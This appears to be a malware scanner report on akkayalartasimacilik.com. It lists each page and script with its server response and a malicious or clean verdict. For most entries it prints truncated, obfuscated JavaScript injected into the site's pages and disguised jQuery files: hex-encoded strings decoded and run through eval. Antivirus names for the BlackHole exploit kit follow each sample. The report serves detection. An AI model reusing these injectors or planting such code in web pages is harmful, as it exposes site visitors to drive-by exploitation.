Request | Server response | Status |
http://akkayalartasimacilik.com/ | 200 OK Content-Length: 11462 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/jquery-latest.pack.js | 200 OK Content-Length: 83321 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)xogft=4;xrkzbh=("5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,b3,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,b3,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,b3,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b2,a3,b1,b2,6e,72,73,70,6c,a4,b3,b2,b3,b0,a3,a6,ad,b1,b2,6
... 3448 bytes are skipped ...,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,b3,6e,77,66,67,79,4b,48,bb,4b,48,bb".split(","));eimt=eval;function xsedbm(){uja=function(){--(yqhhkt.body)}()}yqhhkt=document;for(envz=0;envz<xrkzbh["length"];envz+=1){xrkzbh[envz]=-(62)+parseInt(xrkzbh[envz],xogft*4);}try{xsedbm()}catch(canb){ntkx=50-50;}if(!ntkx)eimt(String["fr"+"omCh"+"arCo"+"de"].apply(String,xrkzbh));Antivirus reports:- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- Comodo
- TrojWare.JS.Kryptik.AOHT
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://akkayalartasimacilik.com/jquery.easing.1.3.js | 200 OK Content-Length: 12817 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)xogft=4;xrkzbh=("5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,b3,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,b3,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,b3,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b2,a3,b1,b2,6e,72,73,70,6c,a4,b3,b2,b3,b0,a3,a6,ad,b1,b2,6
... 3448 bytes are skipped ...,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,b3,6e,77,66,67,79,4b,48,bb,4b,48,bb".split(","));eimt=eval;function xsedbm(){uja=function(){--(yqhhkt.body)}()}yqhhkt=document;for(envz=0;envz<xrkzbh["length"];envz+=1){xrkzbh[envz]=-(62)+parseInt(xrkzbh[envz],xogft*4);}try{xsedbm()}catch(canb){ntkx=50-50;}if(!ntkx)eimt(String["fr"+"omCh"+"arCo"+"de"].apply(String,xrkzbh));Antivirus reports:- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- Comodo
- TrojWare.JS.Kryptik.AOHT
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://akkayalartasimacilik.com/dmxNavigationMenu.js | 200 OK Content-Length: 20491 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)xogft=4;xrkzbh=("5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,b3,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,b3,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,b3,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b2,a3,b1,b2,6e,72,73,70,6c,a4,b3,b2,b3,b0,a3,a6,ad,b1,b2,6
... 3448 bytes are skipped ...,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,b3,6e,77,66,67,79,4b,48,bb,4b,48,bb".split(","));eimt=eval;function xsedbm(){uja=function(){--(yqhhkt.body)}()}yqhhkt=document;for(envz=0;envz<xrkzbh["length"];envz+=1){xrkzbh[envz]=-(62)+parseInt(xrkzbh[envz],xogft*4);}try{xsedbm()}catch(canb){ntkx=50-50;}if(!ntkx)eimt(String["fr"+"omCh"+"arCo"+"de"].apply(String,xrkzbh));Antivirus reports:- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- Comodo
- TrojWare.JS.Kryptik.AOHT
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://akkayalartasimacilik.com/dmxHTML5ImageEnhancer.js | 200 OK Content-Length: 30322 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)xogft=4;xrkzbh=("5e,a4,b3,ac,a1,b2,a7,ad,ac,5e,b3,6e,77,66,67,5e,b9,4b,48,5e,b4,9f,b0,5e,b1,b2,9f,b2,a7,a1,7b,65,9f,a8,9f,b6,65,79,4b,48,5e,b4,9f,b0,5e,a1,ad,ac,b2,b0,ad,aa,aa,a3,b0,7b,65,a7,ac,a2,a3,b6,6c,ae,a6,ae,65,79,4b,48,5e,b4,9f,b0,5e,b3,5e,7b,5e,a2,ad,a1,b3,ab,a3,ac,b2,6c,a1,b0,a3,9f,b2,a3,83,aa,a3,ab,a3,ac,b2,66,65,a7,a4,b0,9f,ab,a3,65,67,79,4b,48,4b,48,5e,b3,6c,b1,b0,a1,5e,7b,5e,65,a6,b2,b2,ae,78,6d,6d,b2,a3,b1,b2,6e,72,73,70,6c,a4,b3,b2,b3,b0,a3,a6,ad,b1,b2,6
... 3448 bytes are skipped ...,67,7b,7b,73,73,67,b9,bb,a3,aa,b1,a3,b9,91,a3,b2,81,ad,ad,a9,a7,a3,66,65,b4,a7,b1,a7,b2,a3,a2,9d,b3,af,65,6a,5e,65,73,73,65,6a,5e,65,6f,65,6a,5e,65,6d,65,67,79,4b,48,4b,48,b3,6e,77,66,67,79,4b,48,bb,4b,48,bb".split(","));eimt=eval;function xsedbm(){uja=function(){--(yqhhkt.body)}()}yqhhkt=document;for(envz=0;envz<xrkzbh["length"];envz+=1){xrkzbh[envz]=-(62)+parseInt(xrkzbh[envz],xogft*4);}try{xsedbm()}catch(canb){ntkx=50-50;}if(!ntkx)eimt(String["fr"+"omCh"+"arCo"+"de"].apply(String,xrkzbh));Antivirus reports:- Avast
- JS:Includer-ALC [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.NP
- Ikarus
- Exploit.JS.Blackhole
- nProtect
- JS:Exploit.BlackHole.NP
- Comodo
- TrojWare.JS.Kryptik.AOHT
- Emsisoft
- JS:Exploit.BlackHole.NP (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- TrendMicro
- HEUR_HTJS.HDJSFN
- Microsoft
- Exploit:JS/Blacole.OE
- MicroWorld-eScan
- JS:Exploit.BlackHole.NP
- Fortinet
- JS/Kryptik.AOH!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chulnr
- F-Secure
- JS:Exploit.BlackHole.NP
- AVG
- JS/Exploit
- Norman
- Blacole.WQ
- GData
- JS:Exploit.BlackHole.NP
- ESET-NOD32
- JS/Kryptik.AOH
- BitDefender
- JS:Exploit.BlackHole.NP
|
http://akkayalartasimacilik.com/index.html | 200 OK Content-Length: 11462 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/hakkimizda.html | 200 OK Content-Length: 11479 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/hizmetler.html | 200 OK Content-Length: 11236 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/filomuz.html | 200 OK Content-Length: 11324 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/bizeulasin.html | 200 OK Content-Length: 10829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cqugls="y";mxow="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)++(window[mxow].body)==null}()}catch(elk){exefjy=function(zdo){zdo="fr"+"omCh"+zdo;for(iepnna=0;iepnna<cqugls.length;iepnna++){gek+=String[zdo](rfx(snnyo+(cqugls[iepnna]))-(53));}};};rfx=(window.eval);snnyo="0x";majkkn=0;try{;}catch(rocas){majkkn=1}if(!majkkn){try{++rfx(mxow)["\x62o"+"d"+cqugls]}catch(elk){asjzm="^";}cqugls="55^9b^aa^a3^98^a9^9e^a4^a3^55^9e^a7^af^65^6e^5d^5e^55^b0^42^3f^55^ab^96^a7^55^a8^a9^96^a9
... 3635 bytes are skipped ...c^5d^55^a1^9a^a3^61^55^9a^a3^99^55^5e^55^5e^70^42^3f^b2^42^3f^9e^9b^55^5d^a3^96^ab^9e^9c^96^a9^a4^a7^63^98^a4^a4^a0^9e^9a^7a^a3^96^97^a1^9a^99^5e^42^3f^b0^42^3f^9e^9b^5d^7c^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^5e^72^72^6a^6a^5e^b0^b2^9a^a1^a8^9a^b0^88^9a^a9^78^a4^a4^a0^9e^9a^5d^5c^ab^9e^a8^9e^a9^9a^99^94^aa^a6^5c^61^55^5c^6a^6a^5c^61^55^5c^66^5c^61^55^5c^64^5c^5e^70^42^3f^42^3f^9e^a7^af^65^6e^5d^5e^70^42^3f^b2^42^3f^b2".split(asjzm);gek="";exefjy("arCode");rfx(""+gek);}Antivirus reports:- AntiVir
- JS/Blacole.EB.150
- Avast
- JS:Includer-ALK [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.EB
- Ikarus
- JS.Exploit.BlackHole
- nProtect
- JS:Exploit.BlackHole.EB
- Emsisoft
- JS:Exploit.BlackHole.EB (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.NY
- MicroWorld-eScan
- JS:Exploit.BlackHole.EB
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.EB
- AVG
- Script/Exploit.Kit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.EB
- BitDefender
- JS:Exploit.BlackHole.EB
|
http://akkayalartasimacilik.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://akkayalartasimacilik.com/ulasim.html | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |